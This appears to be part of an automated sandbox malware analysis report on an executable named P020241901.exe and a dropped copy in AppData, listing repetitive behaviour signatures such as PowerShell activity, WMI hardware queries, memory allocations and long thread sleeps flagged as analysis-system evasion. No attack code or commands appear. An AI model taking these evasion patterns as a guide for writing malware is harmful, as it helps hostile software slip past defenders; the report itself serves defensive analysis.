                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: P020241901.exe PID: 4204, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: VKkzqGUhsZwwm.exe PID: 7260, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\P020241901.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 970000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 2580000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 2390000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 7340000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 6D20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 8340000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 9340000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 2800000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 2A00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Memory allocated: 2840000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: B90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: 2630000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: 2470000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: 6FC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: 69E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: 6FC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: 2A60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: 2AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Memory allocated: 4AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2478
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2389
                      Source: C:\Users\user\Desktop\P020241901.exe Window / User API: threadDelayed 4323
                      Source: C:\Users\user\Desktop\P020241901.exe Window / User API: threadDelayed 5507
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Window / User API: threadDelayed 2000
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe Window / User API: threadDelayed 7850
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 6656 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4580 Thread sleep count: 2478 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992 Thread sleep count: 110 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4160 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6224 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep count: 31 > 30
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -28592453314249787s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -99888s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7324 Thread sleep count: 4323 > 30
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -99774s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -99661s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7324 Thread sleep count: 5507 > 30
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -99422s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -99186s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -99077s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98965s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98843s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98734s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98625s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98501s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98375s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98265s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98156s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -98047s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97937s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97828s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97718s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97609s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97500s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97390s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97281s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97171s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -97062s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -96953s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -96843s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -96734s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -96625s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -96515s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -96406s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -96169s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -96061s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95953s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95838s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95718s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95609s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95495s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95375s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95265s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95153s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -95031s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -94921s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -94812s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -94703s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -94593s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -94484s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -94375s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe TID: 7296 Thread sleep time: -94265s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7420 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -22136092888451448s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7620 Thread sleep count: 2000 > 30
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -99891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7620 Thread sleep count: 7850 > 30
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -99381s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -99250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -99141s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -99030s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98922s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98813s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98139s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -98031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97922s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97702s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97324s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -97000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -96891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -96781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -96672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -96563s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -96438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -96328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -96219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -96094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -95094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -94969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -94859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -94750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -94641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -94531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -94422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe TID: 7612 Thread sleep time: -94312s >= -30000s
                      Source: C:\Users\user\Desktop\P020241901.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\P020241901.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\P020241901.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 100000
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 99888
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 99774
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 99661
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 99531
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 99422
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 99297
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 99186
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 99077
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98965
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98843
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98734
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98625
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98501
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98375
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98265
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98156
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 98047
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 97937
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 97828
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 97718
                      Source: C:\Users\user\Desktop\P020241901.exe Thread delayed: delay time: 97609
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97500Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97390Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97281Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97171Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 97062Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96953Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96843Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96734Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96625Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96515Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96406Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96169Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 96061Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95953Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95838Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95718Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95609Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95495Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95375Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95265Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95153Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 95031Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94921Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94812Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94703Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94593Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94484Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94375Jump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeThread delayed: delay time: 94265Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeThread delayed: delay time: 922337203685477Jump to behavior
